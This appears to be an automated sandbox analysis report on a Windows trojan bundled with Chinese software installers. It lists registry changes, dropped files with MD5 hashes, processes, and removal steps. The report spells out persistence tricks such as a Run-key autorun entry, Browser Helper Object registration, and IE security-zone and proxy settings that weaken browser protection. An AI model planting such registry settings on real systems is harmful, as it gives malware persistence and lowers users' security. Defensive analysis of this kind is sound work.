[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"URLInfoAbout" = "http://help.ikaka.com/"
[HKLM\SOFTWARE\rising\RAV]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\RAV"
"Type" = "17"
"InstallPath" = "%Program Files%\Rising\RAV"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services]
"Rising" = "Admin Test"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monShowName" = "gWx0Lv5HYFoFGTooQE0aWgxX"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B EB 5D B8 D3 40 DB 2E 70 4B 40 80 D4 A9 85 4B"
[HKLM\SOFTWARE\rising\RAV]
"(Default)" = "Rising Software Deployment System"
"Version" = "24.00.43.49"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"regtray" = "gWx0Lv5HYFoFbTsMa1I="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}]
"ProcID" = "{F2565346-E9F9-6648-3030-303030303030}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayName" = "Rising Software Deployment System"
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monServerName" = "gWx0Lv5HYEghWB8AXVVr"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}]
"ProcKey" = "RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw"
The Trojan modifies IE security zone settings so that all local web nodes with no dots, which do not refer to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\System\CurrentControlSet\Services]
"Rising"
The process 9158.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\9158web]
"VideoDevice" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 30 72 92 DD 80 34 D3 5E 1E C3 95 A9 B4 E1 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes with no dots, which do not refer to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
The process popwndexe.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C4 C3 E0 07 87 56 EA 2D 7C F7 5D 82 1E CE 20"
The process xianfengupdate.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore\AllowedDomains\*]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"(Default)" = "AccountProtect Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF EE 9E 4D 17 3B 00 D8 11 50 97 5C F2 DD 87 FA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore]
"Flags" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 C9 DF 57 1B 7B 63 FA 3B 44 DE 4B 18 5F 10 BA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
26c9871fe8541e68df2b412884fdd3e4 | c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe |
4efba0b5ffd3059d1d76c70b67850138 | c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe |
09006a81a579d90212ccc2bb62cfecc2 | c:\Documents and Settings\All Users\Application Data\tools\bdmanager.dll |
231af98afa9420da45dbeff33867e39f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll |
91cadaaa24017a099cce1df248e25225 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll |
4f53e6f3881ff3e1ee1cc0dc0561410f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll |
959ea64598b9a3e494c00e8fa793be7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\System.dll |
012a8879efa6f8dbc3c6ba58a659fefb | c:\Program Files\tools\BaiduP2PService.exe |
a86a90ba120c455ac0e3655f146d5a0f | c:\Program Files\tools\P2PBase.dll |
3b14cae0ea1d045bb5b196017913edb3 | c:\Program Files\tools\P2PStatReport.dll |
894ab861e608eacbac24280ab234368f | c:\Program Files\tools\P2SBase.dll |
83bcf3ad82ce65d2bd0fdd364fe32cb5 | c:\Program Files\tools\sr.exe |
3abd5c47c61a71472f00bd45991a916f | c:\Program Files\tools\tools.exe |
00986c841bcc897b86a2b394a1887295 | c:\Program Files\xfplay\tools.exe |
a5e5b2726680a87868f241264e53be5a | c:\Program Files\xfplay\xianfeng.exe |
c54a6cbbc8cd6c9309cc2b3aa4eba6d4 | c:\Program Files\xfplay\xianfengkunbang.exe |
b2ef6010ddeca9357fae34e1fbe4ee2b | c:\Program Files\xfplay\xianfengupdate.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\卸载 9158多人视频.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\9158多人视频.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158多人视频.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
